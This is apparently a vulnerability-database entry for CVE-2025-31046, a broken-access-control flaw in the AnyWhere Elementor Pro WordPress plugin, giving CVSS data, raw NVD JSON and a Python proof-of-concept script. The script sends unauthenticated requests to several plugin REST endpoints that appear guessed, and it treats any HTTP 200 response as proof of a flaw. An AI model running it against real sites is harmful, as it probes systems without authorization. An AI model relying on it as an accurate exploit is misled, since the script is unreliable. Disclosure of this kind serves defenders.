Security Vulnerability Report
中文
CVE-2025-31046 CVSS 4.3 MEDIUM

CVE-2025-31046

Published: 2026-01-05 11:17:40
Last Modified: 2026-04-28 19:30:56

Description

Missing Authorization vulnerability in WPvibes AnyWhere Elementor Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AnyWhere Elementor Pro: from n/a through 2.29.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

AnyWhere Elementor Pro <= 2.29 (从任意版本起)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-31046 PoC - Missing Authorization in AnyWhere Elementor Pro # Target: WordPress site with AnyWhere Elementor Pro plugin (<=2.29) def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-31046 """ # Plugin REST API endpoint endpoints = [ '/wp-json/anywhere-elementor/v1/templates', '/wp-json/anywhere-elementor/v1/settings', '/wp-admin/admin-ajax.php' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send GET request without authentication response = requests.get(url, timeout=10, verify=False) # Check if endpoint is accessible without proper authorization if response.status_code == 200: print(f"[+] Potentially vulnerable endpoint found: {url}") print(f"[+] Response preview: {response.text[:200]}") return True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected endpoint: {url}") except requests.RequestException as e: print(f"[!] Error accessing {url}: {e}") return False def exploit_authorization_bypass(target_url): """ Exploit CVE-2025-31046 to perform unauthorized actions """ # Target WordPress with low-privilege account # This demonstrates accessing protected functionality # Example: Access template list without authorization exploit_url = target_url.rstrip('/') + '/wp-json/anywhere-elementor/v1/templates' headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: response = requests.get(exploit_url, headers=headers, timeout=10) if response.status_code == 200: print("[!] VULNERABLE: Unauthorized access to template data possible") print(f"[!] Data exposure: {response.text}") return True except requests.RequestException as e: print(f"[!] Exploitation failed: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-31046.py <target_url>") print("Example: python cve-2025-31046.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning target: {target}") print(f"[*] CVE-2025-31046 - AnyWhere Elementor Pro Authorization Bypass\n") check_vulnerability(target) exploit_authorization_bypass(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31046", "sourceIdentifier": "[email protected]", "published": "2026-01-05T11:17:40.490", "lastModified": "2026-04-28T19:30:55.833", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPvibes AnyWhere Elementor Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AnyWhere Elementor Pro: from n/a through 2.29."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/theme/anywhere-elementor-pro/vulnerability/wordpress-anywhere-elementor-pro-2-29-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}